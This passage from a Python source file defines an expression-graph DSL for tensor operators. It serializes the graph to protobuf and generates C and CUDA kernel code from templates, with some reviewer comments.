        :return: A protobuf (a copy, so callers cannot mutate internal state)
        """
        tt = lang.TensorType()
        tt.CopyFrom(self._proto_tensor_type)
        return tt
def _list_to_str(x):
out = ''
for i, cur in enumerate(x):
out += str(cur)
if i < len(x) - 1:
out += ', '
return out
class ExpressionDAG(object):
    """
    Singleton object for keeping track of expressions in the order in which they are defined. Expressions must register themselves
    with the ExpressionDAG upon construction with the append() method.
    """
    # all registered expressions, in definition order
    exprs = []
    # id() of each registered expression, parallel to exprs. Lookup is by
    # identity because Scalar overloads __eq__ to build expression nodes,
    # so list.index() on exprs would misbehave.
    expr_ids = []
    # shape of the work group; set exactly once by the PositionTensor
    workgroup_shape = None
    num_outputs = 0
    num_inputs = 0
    @staticmethod
    def io_types():
        """
        Collect the TensorTypes of all registered inputs and outputs.
        :return: a tuple (input_types, output_types), each indexed by io_index
        """
        input_types = ExpressionDAG.num_inputs*[None]
        output_types = ExpressionDAG.num_outputs*[None]
        found_count = 0
        for expr in ExpressionDAG.exprs:
            if expr.proto_expr.code == lang.INPUT:
                input_types[expr.proto_expr.io_index] = TensorType.from_proto(expr.proto_expr.tensor_type)
                found_count += 1
            elif expr.proto_expr.code == lang.OUTPUT:
                output_types[expr.proto_expr.io_index] = TensorType.from_proto(expr.proto_expr.tensor_type)
                found_count += 1
            # stop early once every input and output has been seen
            if found_count == ExpressionDAG.num_inputs + ExpressionDAG.num_outputs:
                break
        return input_types, output_types
    @staticmethod
    def clear():
        """
        Clear all currently tracked expressions.
        :return:
        """
        ExpressionDAG.exprs = []
        ExpressionDAG.expr_ids = []
        ExpressionDAG.workgroup_shape = None
        ExpressionDAG.num_outputs = 0
        ExpressionDAG.num_inputs = 0
    @staticmethod
    def append(item):
        """
        Append an item to the expression list.
        :param item: The expression to append.
        :return: None
        :raises TypeError: if item is not an _Expression
        :raises ValueError: if a second position tensor is defined, or if
            inputs/outputs are registered out of io_index order
        """
        if not issubclass(item.__class__, _Expression):
            raise TypeError('Can only append expressions.')
        if type(item) is PositionTensor:
            if ExpressionDAG.workgroup_shape is None:
                ExpressionDAG.workgroup_shape = item.proto_expr.uint32_data
            else:
                raise ValueError('Already defined the position tensor.')
        if type(item) is OutputTensor:
            if item.proto_expr.io_index != ExpressionDAG.num_outputs:
                raise ValueError('Trying to add outputs to expression dag out of order')
            ExpressionDAG.num_outputs += 1
        if type(item) is InputTensor:
            if item.proto_expr.io_index != ExpressionDAG.num_inputs:
                raise ValueError('Trying to add inputs to expression dag out of order')
            ExpressionDAG.num_inputs += 1
        # Assign names to each expression as they get appended
        if item.name is None:
            if type(item) is InputTensor:
                item.name = '(*in'+str(item.proto_expr.io_index)+')'
            elif type(item) is OutputTensor:
                item.name = '(*out'+str(item.proto_expr.io_index)+')'
            elif type(item) is PositionTensor:
                item.name = 'position'
            elif type(item) is _ConstScalar:
                # constants are named with their literal so they inline in C
                item.name = str(item.value())
            elif type(item) is _ConstTensor:
                item.name = '{'+_list_to_str(item.to_array().tolist())+'}'
            else:
                item.name = 'e'+str(len(ExpressionDAG.exprs))
        ExpressionDAG.exprs.append(item)
        ExpressionDAG.expr_ids.append(id(item))
    @staticmethod
    def remove_endif():
        """
        find and remove the most recent _EndIf expression, used for continuing if blocks
        :return: None
        :raises SyntaxError: if no _EndIf is currently registered
        """
        found_endif = False
        # scan backwards from the most recently appended expression
        for i in range(len(ExpressionDAG.exprs)):
            if type(ExpressionDAG.exprs[-i-1]) is _EndIf:
                found_endif = True
                del(ExpressionDAG.exprs[-i-1])
                del(ExpressionDAG.expr_ids[-i-1])
                break
        if found_endif is False:
            raise SyntaxError('Could not find prior if block')
    @staticmethod
    def as_proto():
        """
        Serialize the current ExpressionDAG as a protocol buffer
        :return: the protobuf
        :raises ValueError: if no workgroup shape (position tensor) was defined
        """
        if ExpressionDAG.workgroup_shape is None:
            raise ValueError('Workgroup shape must be defined with "position_in" function.')
        proto = lang.ExpressionDAG()
        proto.workgroup_shape.extend(ExpressionDAG.workgroup_shape)
        for i, expr in enumerate(ExpressionDAG.exprs):
            proto.expressions.add().CopyFrom(expr.proto_expr)
            operand_indices = []
            for input_expr in expr.input_exprs:
                operand_indices.append(ExpressionDAG.expr_index(input_expr))
            proto.references.add().operand_indices.extend(operand_indices)
        # Reorder op dag to make sure that all elseif conditionals are positioned
        # before entering the if block
        # NOTE(review): `expr.code is lang.IF` compares enum ints with `is`;
        # this relies on CPython's small-int caching -- confirm, `==` would be safer.
        if_block_start = []
        needs_reordering = []
        for i, expr in enumerate(proto.expressions):
            if expr.code is lang.IF:
                if_block_start.append(i)
                needs_reordering.append([])
            elif expr.code is lang.ELSEIF:
                # recursively find all conditional dependencies that need to be reordered
                def find_reorders(x):
                    for ref in proto.references[x].operand_indices:
                        if ref > if_block_start[-1]:
                            find_reorders(ref)
                    needs_reordering[-1].append(x)
                conditional_index = proto.references[i].operand_indices[0]
                find_reorders(conditional_index)
            elif expr.code is lang.ENDIF:
                # build old<->new index maps, then rewrite the whole dag with
                # the elseif dependencies hoisted ahead of the if block
                new_to_old_index = {}
                num_reorders = len(needs_reordering[-1])
                if num_reorders > 0:
                    reorder_count = 0
                    for cur_index in range(if_block_start[-1], needs_reordering[-1][-1] + 1):
                        if cur_index in needs_reordering[-1]:
                            new_to_old_index[if_block_start[-1] + reorder_count] = cur_index
                            reorder_count += 1
                        else:
                            new_to_old_index[cur_index + num_reorders - reorder_count] = cur_index
                    def new_to_old(x):
                        if x in list(new_to_old_index.keys()):
                            return new_to_old_index[x]
                        else:
                            return x
                    old_to_new_index = dict((v, k) for k, v in new_to_old_index.items())
                    def old_to_new(x):
                        if x in list(old_to_new_index.keys()):
                            return old_to_new_index[x]
                        else:
                            return x
                    # perform the reordering
                    new_dag = lang.ExpressionDAG()
                    num_expressions = len(proto.expressions)
                    for cur_index in range(num_expressions):
                        # copy expressions from old spot to new spot
                        cur_expr = proto.expressions[new_to_old(cur_index)]
                        head_expr = new_dag.expressions.add()
                        head_expr.CopyFrom(cur_expr)
                        # copy and update references from old spot to new spot
                        cur_refs = []
                        for ref in proto.references[new_to_old(cur_index)].operand_indices:
                            cur_refs.append(old_to_new(ref))
                        head_reference = new_dag.references.add()
                        head_reference.operand_indices.extend(cur_refs)
                    proto = new_dag
                # finished reordering conditionals, get rid of reordering info
                if_block_start = if_block_start[:-1]
                needs_reordering = needs_reordering[:-1]
        return proto
    @staticmethod
    def from_proto(expression_dag):
        """
        Clear the current ExpressionDAG and build up a fresh one from a serialized protocol buffer.
        :param expression_dag: the serialized protobuf
        :return: None
        """
        # map each expression code to the python class that reconstructs it
        code_to_class = {
            lang.INPUT: InputTensor,
            lang.OUTPUT: OutputTensor,
            lang.CONST_SCALAR: _ConstScalar,
            lang.CONST_TENSOR: _ConstTensor,
            lang.POSITION: PositionTensor,
            lang.VARIABLE: Variable,
            lang.CAST: _Cast,
            lang.TENSOR: LocalTensor,
            lang.ASSIGN_VARIABLE: _AssignVariable,
            lang.ASSIGN_TENSOR: _AssignTensor,
            lang.READ_TENSOR: _ReadTensor,
            lang.RANGE: _Range,
            lang.ENDRANGE: _EndRange,
            lang.IF: _If,
            lang.ELSEIF: _ElseIf,
            lang.ELSE: _Else,
            lang.ENDIF: _EndIf,
            lang.ACOS: _UnaryMath,
            lang.ASIN: _UnaryMath,
            lang.ATAN: _UnaryMath,
            lang.COS: _UnaryMath,
            lang.COSH: _UnaryMath,
            lang.SIN: _UnaryMath,
            lang.SINH: _UnaryMath,
            lang.TAN: _UnaryMath,
            lang.TANH: _UnaryMath,
            lang.EXP: _UnaryMath,
            lang.LOG: _UnaryMath,
            lang.LOG10: _UnaryMath,
            lang.SQRT: _UnaryMath,
            lang.CEIL: _UnaryMath,
            lang.FLOOR: _UnaryMath,
            lang.ABS: _UnaryMath,
            lang.NEGATE: _UnaryMath,
            lang.NOT: _UnaryMath,
            lang.ADD: _BinaryMath,
            lang.SUBTRACT: _BinaryMath,
            lang.MULTIPLY: _BinaryMath,
            lang.DIVIDE: _BinaryMath,
            lang.MODULO: _BinaryMath,
            lang.AND: _BinaryMath,
            lang.OR: _BinaryMath,
            lang.EQUAL: _BinaryMath,
            lang.NOTEQUAL: _BinaryMath,
            lang.LESS: _BinaryMath,
            lang.LESS_EQ: _BinaryMath,
            lang.GREATER: _BinaryMath,
            lang.GREATER_EQ: _BinaryMath,
            lang.MIN: _BinaryMath,
            lang.MAX: _BinaryMath,
            lang.POW: _BinaryMath,
            lang.ATAN2: _BinaryMath,
            lang.ISINF: _UnaryMath,
            lang.ISFINITE: _UnaryMath,
            lang.ISNAN: _UnaryMath,
            lang.MIN_VALUE: _Limits,
            lang.MAX_VALUE: _Limits,
            lang.EPSILON: _Limits
        }
        ExpressionDAG.clear()
        # iterate through each proto expression and build up the graph
        for i, expr in enumerate(expression_dag.expressions):
            cur_refs = expression_dag.references[i].operand_indices
            input_exprs = []
            for cur_ref in cur_refs:
                input_exprs.append(ExpressionDAG.exprs[cur_ref])
            code_to_class[expr.code].from_proto(expr, input_exprs)
    @staticmethod
    def generate(expression_dag, function_name):
        """
        Generate C and CUDA code for evaluating the operation defined in the supplied serialized expression dag
        protocol buffer.
        :param expression_dag: The protobuf
        :param function_name: The name of the function to use
        :return: a tuple containing the source for: the generic c++ interface, and the generic cuda interface
        """
        def _strip_margin(s):
            # remove the leading "|" margin markers from the template literals
            return re.sub('\n[ \t]*\|', '\n', s)
        ExpressionDAG.from_proto(expression_dag)
        inputs = list()
        outputs = list()
        position = None
        for expr in ExpressionDAG.exprs:
            if type(expr) is InputTensor:
                inputs.append(expr)
            elif type(expr) is OutputTensor:
                outputs.append(expr)
            elif type(expr) is PositionTensor:
                position = expr
        num_inputs = len(inputs)
        num_outputs = len(outputs)
        args = list()
        for arg in inputs + outputs:
            args.append(arg.gen_ptr())
        args_str = _list_to_str(args)
        workgroup_shape = position.proto_expr.uint32_data
        workgroup_block_size = [1]  # NOTE(review): unused -- candidate for removal
        num_workers = 1
        for cur_dim in workgroup_shape:
            num_workers *= cur_dim
        expression_src = ''
        for expr in ExpressionDAG.exprs:
            try:
                cur_c = expr.gen_c()
            except NotImplementedError as e:
                # NOTE(review): the original exception 'e' is discarded here
                raise NotImplementedError(str(expr))
            if cur_c != '':
                expression_src += '        ' + cur_c
        # generate c function
        c_src = """
        |//Generated Code
        |#include <stdint.h>
        |#include <stdlib.h>
        |#include <math.h>
        |
        |//aliases for integer absolute values for ints < 32 bits in size
        |//aliases are used because abs() does not work with for
        |// 8 and 16 bit ints in CUDA. We use an alias here so that we can share
        |// code generation infrastructure.
        |#define abs_8(x) abs(x);
        |#define abs_16(x) abs(x);
        |
        |void ${function_name}(${args_str},
        |                      uint32_t block_size, uint32_t thread_index){
        |    uint32_t start = thread_index * block_size;
        |    uint32_t end = start + block_size;
        |    if (end > ${num_workers}) end = ${num_workers};
        |    for(uint32_t worker_index=start; worker_index < end; worker_index++){
        |${expression_src}
        |    }
        |}
        |"""
        c_src = string.Template(c_src).substitute(locals())
        c_src = _strip_margin(c_src)
        cuda_function = _strip_margin(string.Template("""
        |//Generated Code
        |
        |//define integer absolute value function
        |inline __device__ int8_t abs_8(const int8_t & x){ return ( x<0 ) ? -x : x;}
        |inline __device__ int16_t abs_16(const int16_t & x){ return ( x<0 ) ? -x : x;}
        |
        |extern \"C\" __global__
        |void ${function_name}(${args_str}){
        |    uint32_t worker_index = blockIdx.x * blockDim.x + threadIdx.x;
        |    if (worker_index < ${num_workers}) {
        |${expression_src}
        |    }
        |}
        """).substitute(locals()))
        # Generate the c generic parameter interface for unpacking polymorphic io parameters
        generic_args = []
        io_ptrs = ''
        for inp in inputs:
            cur_index = inp.proto_expr.io_index
            cur_name = 'in'+str(cur_index)
            generic_args.append(cur_name + '.p_fixed_len')
            elements = inp.size
            tipe = inp.dtype.as_cstr()
            # union lets the arbitrary-length runtime pointer be passed as a
            # fixed-length array parameter without a cast expression
            io_ptrs += string.Template("""
            |    if(inputs[${cur_index}]->length() != ${elements}) { *err = 1; return; }
            |    union u_in${cur_index}{
            |        const ${tipe} *p_arb_len;
            |        const ${tipe} (*p_fixed_len)[${elements}];
            |    };
            |    union u_in${cur_index} in${cur_index};
            |    in${cur_index}.p_arb_len = inputs[${cur_index}]->get<${tipe}>();
            |""").substitute(locals())
        for outp in outputs:
            cur_index = outp.proto_expr.io_index
            cur_name = 'out'+str(cur_index)
            generic_args.append(cur_name + '.p_fixed_len')
            elements = outp.size
            tipe = outp.dtype.as_cstr()
            io_ptrs += string.Template("""
            |    if(outputs[${cur_index}]->length() != ${elements}) { *err = 1; return; }
            |    union u_out${cur_index}{
            |        ${tipe} *p_arb_len;
            |        ${tipe} (*p_fixed_len)[${elements}];
            |    };
            |    union u_out${cur_index} out${cur_index};
            |    out${cur_index}.p_arb_len = outputs[${cur_index}]->get<${tipe}>();
            |""").substitute(locals())
        args = _list_to_str(generic_args)
        c_generic = """
        |#include "dynamiclibop.h"
        |#include <vector>
        |#include <memory>
        |#include <cfloat>
        |
        |${c_src}
        |
        |extern "C"
        |void ${function_name}_generic_cpp(std::vector<std::shared_ptr<const InputParameter>> inputs,
        |                                  std::vector<std::shared_ptr<OutputParameter>> outputs,
        |                                  uint32_t num_threads, uint32_t thread_index, uint16_t* err){
        |    //check that the number of inputs and outputs is correct
        |    if(inputs.size() != ${num_inputs}){ *err = 1; return; }
        |    if(outputs.size() != ${num_outputs}){ *err = 1; return; }
        |
        |    //check that the size of inputs and outputs is correct, and cast them as pointers to arrays
        ${io_ptrs}
        |    uint32_t block_size = ${num_workers} / num_threads;
        |    if(${num_workers} % num_threads > 0) block_size += 1;
        |    return ${function_name}(${args}, block_size, thread_index);
        |}
        |"""
        c_generic = string.Template(c_generic).substitute(locals())
        c_generic = _strip_margin(c_generic)
        cuda_generic = """
        |#include "dynamiclibop.h"
        |#include <vector>
        |#include <string>
        |#include <memory>
        |#include <cfloat>
        |#include <cuda.h>
        |
        |${cuda_function}
        |
        |extern "C"
        |void ${function_name}_generic_cuda(std::vector<std::shared_ptr<const InputParameter>> inputs,
        |                                   std::vector<std::shared_ptr<OutputParameter>> outputs,
        |                                   CUstream stream, uint16_t threads_per_block, uint16_t* err){
        |    //check that the number of inputs and outputs is correct
        |    if(inputs.size() != ${num_inputs}){ *err = 1; return; }
        |    if(outputs.size() != ${num_outputs}){ *err = 1; return; }
        |
        |    //check that the size of inputs and outputs is correct, and cast them as pointers to arrays
        ${io_ptrs}
        |    //enqueue function on stream
        |    uint32_t num_blocks = ${num_workers} / threads_per_block;
        |    if(${num_workers} % threads_per_block > 0) num_blocks += 1;
        |    ${function_name}<<<num_blocks, threads_per_block, 0, stream>>>(${args});
        |}
        """
        cuda_generic = string.Template(cuda_generic).substitute(locals())
        cuda_generic = _strip_margin(cuda_generic)
        # Generate the cuda generic parameter interface for unpacking polymorphic io parameters
        return c_generic, cuda_generic
    @staticmethod
    def expr_index(expr):
        """
        Resolve the index of a particular expression in the current DAG
        :param expr: the expression
        :return: its index
        """
        return ExpressionDAG.expr_ids.index(id(expr))
class _Expression(object):
    """
    The abstract class that defines the behavior of expressions.
    """
    def __init__(self, expression_code):
        """
        :param expression_code: a ``lang.ExpressionCode`` enum value
        :raises ValueError: if the code is not a valid expression code
        """
        # assign a protocol buffers member corresponding to this python object
        if expression_code not in list(lang.ExpressionCode.values()):
            raise ValueError('Expression code ' + str(expression_code) + ' is not valid.')
        self.proto_expr = lang.Expression()
        self.proto_expr.code = expression_code
        self.input_exprs = []
        self.name = None
    def _register(self):
        # add this fully-constructed expression to the global DAG
        ExpressionDAG.append(self)
    def __str__(self):
        return str(self.proto_expr)
    def gen_c(self):
        raise NotImplementedError('Abstract Class')
    def __ilshift__(self, other):
        raise SyntaxError('Can only use assignment operator <<= on a variable.')
    @staticmethod
    def from_proto(proto, input_exprs):
        raise NotImplementedError('Abstract Class')
    def __bool__(self):
        # bugfix: propagate the result of __nonzero__ (which always raises).
        # Without the return, an override of __nonzero__ that returned a value
        # would make __bool__ return None, which Python 3 rejects.
        return self.__nonzero__()
    def __nonzero__(self):
        raise SyntaxError('Attempting to interpret the truth of an expression. This typically happens when trying to '
                          'use a python native "if", "min", or "max" statement to create a data-dependent conditional '
                          'inside of an operator, which is not supported. To do so you must use the corresponding '
                          '"with if_(...)", "minimum", and "maximum" functions.')
class Scalar(_Expression):
    """
    An expression that refers to a single data value which has a data type

    NOTE: the comparison operators (including __eq__/__ne__) build expression
    nodes instead of returning booleans, so Scalar objects must not be used
    as dict keys / set members or located with list.index().
    """
    def __init__(self, expr_code, dtype):
        """
        :param expr_code: a ``lang.ExpressionCode`` enum value
        :param dtype: the DType of the value this expression produces
        :raises TypeError: if dtype is not a DType
        """
        if not isinstance(dtype, DType):
            raise TypeError('Scalar expressions must be initialized with a DType')
        super(Scalar, self).__init__(expr_code)
        self.dtype = dtype
        self.proto_expr.dtype = dtype.as_proto()
    # Arithmetic, modulo, and comparison operators each emit a _BinaryMath
    # expression node; the reflected variants handle `constant <op> scalar`.
    def __add__(self, other):
        return _BinaryMath(self, other, lang.ADD)
    def __radd__(self, other):
        return _BinaryMath(other, self, lang.ADD)
    def __sub__(self, other):
        return _BinaryMath(self, other, lang.SUBTRACT)
    def __rsub__(self, other):
        return _BinaryMath(other, self, lang.SUBTRACT)
    def __mul__(self, other):
        return _BinaryMath(self, other, lang.MULTIPLY)
    def __rmul__(self, other):
        return _BinaryMath(other, self, lang.MULTIPLY)
    # python 2
    def __div__(self, other):
        return _BinaryMath(self, other, lang.DIVIDE)
    def __rdiv__(self, other):
        return _BinaryMath(other, self, lang.DIVIDE)
    # python 3
    def __truediv__(self, other):
        return _BinaryMath(self, other, lang.DIVIDE)
    def __rtruediv__(self, other):
        return _BinaryMath(other, self, lang.DIVIDE)
    def __mod__(self, other):
        return _BinaryMath(self, other, lang.MODULO)
    def __rmod__(self, other):
        return _BinaryMath(other, self, lang.MODULO)
    def __eq__(self, other):
        return _BinaryMath(self, other, lang.EQUAL)
    def __ne__(self, other):
        return _BinaryMath(self, other, lang.NOTEQUAL)
    def __lt__(self, other):
        return _BinaryMath(self, other, lang.LESS)
    def __le__(self, other):
        return _BinaryMath(self, other, lang.LESS_EQ)
    def __gt__(self, other):
        return _BinaryMath(self, other, lang.GREATER)
    def __ge__(self, other):
        return _BinaryMath(self, other, lang.GREATER_EQ)
    def __neg__(self):
        return _UnaryMath(self, lang.NEGATE)
    @staticmethod
    def from_proto(proto, input_exprs):
        raise NotImplementedError('Abstract Class')
    def gen_c(self):
        raise NotImplementedError('Abstract Class')
class _TensorExpression(_Expression):
    """
    An expression that refers to a tensor of data which has a TensorType
    """
    def __init__(self, expr_code, tensor_type):
        """
        :param expr_code: a ``lang.ExpressionCode`` enum value
        :param tensor_type: the TensorType of this expression
        """
        super(_TensorExpression, self).__init__(expr_code)
        # mirror the TensorType fields for convenient attribute access
        self.dtype = tensor_type.dtype
        self.shape = tensor_type.shape
        self.size = tensor_type.size
        self.rank = tensor_type.rank
        self.tensor_type = tensor_type
        self.proto_expr.tensor_type.CopyFrom(tensor_type.as_proto())
    def gen_ptr(self):
        # C declaration of this tensor as a function parameter
        raise NotImplementedError('Abstract Class')
    @staticmethod
    def from_proto(proto, input_exprs):
        raise NotImplementedError('Abstract Class')
    def gen_c(self):
        raise NotImplementedError('Abstract Class')
def _to_scalar_index(target_shape, index):
    """
    Helper function for indexing tensors. All tensors are stored as C-style flattened arrays in memory, but are indexed
    from the API with an index for each dimension. This function resolves the scalar index of the tensor memory from
    the input index. The length of the input index must always be the same as the rank of the target tensor. Indices
    can be a tensor, or a mixed iterable of constants, scalar expressions, and 0-D tensor expressions.
    :param target_shape: The shape of the tensor to be indexed
    :param index: The index tensor or iterable
    :return: a scalar expression containing the index of the flattened target tensor memory
    :raises IndexError: when the index length does not match the target rank,
        or a constant index is statically out of bounds
    :raises TypeError: when the index cannot be interpreted at all
    """
    target_rank = len(target_shape)
    # block_size[i] ends up holding the row-major (C order) stride of dim i
    block_size = [1]
    for cur_dim in range(len(target_shape)-1, 0, -1):
        block_size.append(block_size[-1]*target_shape[cur_dim])
    block_size.reverse()
    # try to wrap index as a const tensor
    try:
        index_expr = _ConstTensor(index)
    except TypeError:
        index_expr = index
    # wrap scalar expressions as lists
    if issubclass(index_expr.__class__, Scalar):
        index_expr = [index_expr]
    # try to wrap index as an explicit array tensor
    # (e.g. img[row, column] where both row and column are scalar variables of the same type)
    # allow for constants to be mixed with expressions (e.g. img[row, 5])
    if type(index_expr) is list or type(index_expr) is tuple:
        explicit_len = len(index_expr)
        if target_rank != explicit_len:
            raise IndexError('length of index list (' + str(explicit_len) +
                             ') must match indexed tensor rank (' + str(target_rank) + ')')
        exprs = []
        for value in index_expr:
            if issubclass(value.__class__, _Expression):
                if not issubclass(value.__class__, Scalar):
                    if issubclass(value.__class__, _TensorExpression) and value.size == 1:
                        # enable indexing with size == 1 tensor
                        # This typically arises when the workground shape is 1D and the position
                        # tensor is a single value.
                        value = value[0]
                    else:
                        raise TypeError('Must index tensors with an int or a scalar expression. Instead got:\n' +
                                        str(value))
                exprs.append(value)
            else:
                # this dimension is constant, perform static bounds checking
                cur_dim = len(exprs)
                cur_shape = target_shape[cur_dim]
                cur_value = int(np.floor(value))
                if cur_value >= cur_shape or cur_value < 0:
                    raise IndexError('Expected index to be in range [0, ' + str(cur_shape) +
                                     '), but received index value ' + str(cur_value))
                exprs.append(cur_value)
        # accumulate the flat offset: sum of per-dimension index * stride
        index = None
        for i, expr in enumerate(exprs):
            if not isinstance(expr, six.integer_types):
                # todo: optionally dynamically constrain each non-constant dimensional index to within shape bounds
                # bound_expr = cast(minimum(maximum(expr, 0), target_shape[i]-1), uint64)
                bound_expr = cast(expr, uint64)
            else:
                bound_expr = expr
            if index is None:
                index = bound_expr*block_size[i]
            else:
                index = index + bound_expr*block_size[i]
        return index
    elif type(index_expr) is _ConstTensor:
        # indexing with a constant, perform static bounds checking
        if len(index_expr.shape) != 1:
            raise IndexError('Index must be one dimensional')
        if index_expr.shape[0] != target_rank:
            raise IndexError('length of index tensor (' + str(index_expr.shape[0]) +
                             ') must match indexed tensor rank (' + str(target_rank) + ')')
        data = np.floor(index_expr.to_array())
        # fully constant index: the flat offset is a plain python int
        index = 0
        for i, elem in enumerate(data):
            cur_shape = target_shape[i]
            cur_value = int(elem)
            if cur_value >= cur_shape or cur_value < 0:
                raise IndexError('Expected index to be in range [0, ' + str(cur_shape) +
                                 '), but received index value ' + str(cur_value))
            index += int(elem)*block_size[i]
        return index
    elif type(index_expr) in [LocalTensor, PositionTensor, InputTensor]:
        if len(index_expr.shape) != 1:
            raise IndexError('Index must be one dimensional')
        if index_expr.shape[0] != target_rank:
            raise IndexError('length of index tensor (' + str(index_expr.shape[0]) +
                             ') must match indexed tensor rank (' + str(target_rank) + ')')
        # index held in a runtime tensor: read each element and accumulate
        index = None
        for i in range(target_rank):
            cur_shape = target_shape[i]
            cur_index = _ReadTensor(index_expr, i)
            # todo: optionally dynamically constrain each dimensional index to within shape bounds
            # bound_index = minimum(maximum(cast(cur_index, uint64), 0), cur_shape-1)
            bound_index = cast(cur_index, uint64)
            if index is None:
                index = bound_index*block_size[i]
            else:
                index = index + bound_index*block_size[i]
        return index
    else:
        raise TypeError('Cannot index a tensor with a ' + str(type(index_expr)))
class _Readable(object):
    """
    A trait for tensors which enables them to be read
    """
    def __getitem__(self, item):
        # resolve the (possibly multi-dimensional) index to a flat offset
        # and emit a read expression
        return _ReadTensor(self, _to_scalar_index(self.shape, item))
class _Writable(object):
    """
    A trait for tensors which enables them to be written
    """
    def __setitem__(self, key, value):
        # resolve the (possibly multi-dimensional) index to a flat offset
        # and emit an assignment expression
        _AssignTensor(self, _to_scalar_index(self.shape, key), value)
def _tensor_type_polymorhpic(*args):
    """
    A helper function for resolving polymorphic inputs into a TensorType
    :param args: args the define a TensorType, can be either a TensorType or a shape and a DType
    :return: the resolved TensorType
    :raises TypeError: when the arguments cannot be interpreted
    """
    if len(args) == 2:
        return TensorType(args[0], args[1])
    if len(args) == 1 and type(args[0]) is TensorType:
        return args[0]
    raise TypeError('Expected a TensorType or a shape and a dtype as arguments')
def input(*args):
    """
    Create a new input

    NOTE: shadows the builtin ``input`` within this module.
    :param args: args the define a TensorType, can be either a TensorType or a shape and a DType
    :return: the input expression
    """
    tensor_type = _tensor_type_polymorhpic(*args)
    # io_index comes from the current input count; registration inside
    # InputTensor.__init__ increments ExpressionDAG.num_inputs
    return InputTensor(tensor_type, ExpressionDAG.num_inputs)
class InputTensor(_TensorExpression, _Readable):
    """
    A read-only input tensor expression
    """
    def __init__(self, tensor_type, io_index):
        """
        :param tensor_type: the TensorType of this input
        :param io_index: position of this input in the operator signature;
            must fit in an unsigned 32 bit integer
        """
        if not isinstance(tensor_type, TensorType):
            raise TypeError
        if not isinstance(io_index, six.integer_types):
            raise TypeError
        # NOTE(review): super(self.__class__, ...) breaks under subclassing;
        # safe only while this class is never subclassed -- confirm.
        super(self.__class__, self).__init__(lang.INPUT, tensor_type)
        if io_index < 0 or io_index > 2**32-1:
            raise ValueError
        self.proto_expr.io_index = io_index
        super(self.__class__, self)._register()
    def gen_ptr(self):
        """Generate the C parameter declaration for this input array."""
        tipe = self.dtype.as_cstr()
        name = self.name
        elems = self.size
        p = string.Template('const ${tipe} ${name}[${elems}]').substitute(locals())
        return p
    @staticmethod
    def from_proto(proto, input_exprs):
        """Recover an InputTensor from its protobuf serialization."""
        tt = TensorType.from_proto(proto.tensor_type)
        return InputTensor(tt, proto.io_index)
    def gen_c(self):
        # inputs emit no statements; they are referenced by parameter name
        return ''
def output(*args):
    """
    Define a new output
    :param args: args the define a TensorType, can be either a TensorType or a shape and a DType
    :return: a tensor expression which refers to the newly defined output tensor
    :Example:
    Create a new output tensor ``out`` based on the ``TensorType`` of input tensor ``in0`` ::
    out = output(in0.tensor_type)
    :Example:
    Create a new output tensor ``out`` based on the ``shape`` of input tensor ``in0`` and the ``DType`` of input tensor
    ``in1``::
    out = output(in0.shape, in1.dtype)
    """
    tensor_type = _tensor_type_polymorhpic(*args)
    # io_index comes from the current output count; registration inside
    # OutputTensor.__init__ increments ExpressionDAG.num_outputs
    return OutputTensor(tensor_type, ExpressionDAG.num_outputs)
def output_like(other):
    """
    Define a new output with the same TensorType as another tensor
    :param other: another tensor
    :return: a tensor expression which refers to the newly defined output tensor
    """
    tensor_type = TensorType.like(other)
    return output(tensor_type)
class OutputTensor(_TensorExpression, _Writable):
    """
    A write-only output expression
    """
    def __init__(self, tensor_type, io_index):
        """
        :param tensor_type: the TensorType of this output
        :param io_index: position of this output in the operator signature;
            must fit in an unsigned 32 bit integer
        """
        if not isinstance(tensor_type, TensorType):
            raise TypeError
        if not isinstance(io_index, six.integer_types):
            raise TypeError
        # NOTE(review): super(self.__class__, ...) breaks under subclassing;
        # safe only while this class is never subclassed -- confirm.
        super(self.__class__, self).__init__(lang.OUTPUT, tensor_type)
        if io_index < 0 or io_index > 2**32-1:
            raise ValueError
        self.proto_expr.io_index = io_index
        super(self.__class__, self)._register()
    def gen_ptr(self):
        """Generate the C parameter declaration for this output array."""
        tipe = self.dtype.as_cstr()
        name = self.name
        elems = self.size
        p = string.Template('${tipe} ${name}[${elems}]').substitute(locals())
        return p
    @staticmethod
    def from_proto(proto, input_exprs):
        """Recover an OutputTensor from its protobuf serialization."""
        tt = TensorType.from_proto(proto.tensor_type)
        return OutputTensor(tt, proto.io_index)
    def gen_c(self):
        # outputs emit no statements; they are referenced by parameter name
        return ''
class _ConstScalar(Scalar):
    """
    A constant scalar expression wrapping a Python int or float.

    Floats are stored as float64 and ints as int64 in the protobuf payload.
    """
    def __init__(self, value):
        if type(value) is float:
            super(self.__class__, self).__init__(lang.CONST_SCALAR, float64)
            self.proto_expr.double_data.append(value)
        elif isinstance(value, six.integer_types):
            super(self.__class__, self).__init__(lang.CONST_SCALAR, int64)
            self.proto_expr.sint64_data.append(value)
        else:
            tipe = str(type(value))
            raise TypeError('Tried to wrap a '+tipe+' as a ConstScalar. Can only wrap an int or float')
        super(self.__class__, self)._register()

    def value(self):
        """Return the wrapped Python value (float64 and int64 constants only)."""
        if self.proto_expr.dtype == lang.FLOAT64:
            return float(self.proto_expr.double_data[0])
        elif self.proto_expr.dtype == lang.INT64:
            return int(self.proto_expr.sint64_data[0])
        else:
            raise ValueError('Can only get a value from float64 or int64 constants.')

    @staticmethod
    def from_proto(proto, input_exprs):
        # NOTE(review): FLOAT32 is accepted here although __init__ only ever
        # produces FLOAT64/INT64 constants -- presumably for protos written by
        # another frontend; confirm. Note also that value() cannot read a
        # FLOAT32 constant.
        if proto.dtype == lang.FLOAT64:
            return _ConstScalar(float(proto.double_data[0]))
        elif proto.dtype == lang.FLOAT32:
            return _ConstScalar(float(proto.float_data[0]))
        elif proto.dtype == lang.INT64:
            return _ConstScalar(int(proto.sint64_data[0]))
        else:
            raise ValueError('Cannot recover constant scalar protobuf.')

    def gen_c(self):
        # No standalone C statement is emitted for constants; the commented
        # line shows a previous declaration-based approach.
        # return 'const ' + self.dtype.as_cstr() + ' ' + self.name + ' = ' + str(self.value()) + ';\n'
        return ''
class _ConstTensor(_TensorExpression, _Readable):
    """
    A constant tensor expression wrapping a list, tuple, numpy array, or number.
    """
    # translation table between dtypes and retrieval function for the data container to use
    proto_data_lut = {
        float16: lambda x: x.float_data,
        float32: lambda x: x.float_data,
        float64: lambda x: x.double_data,
        int8: lambda x: x.sint32_data,
        int16: lambda x: x.sint32_data,
        int32: lambda x: x.sint32_data,
        int64: lambda x: x.sint64_data,
        uint8: lambda x: x.uint32_data,
        uint16: lambda x: x.uint32_data,
        uint32: lambda x: x.uint32_data,
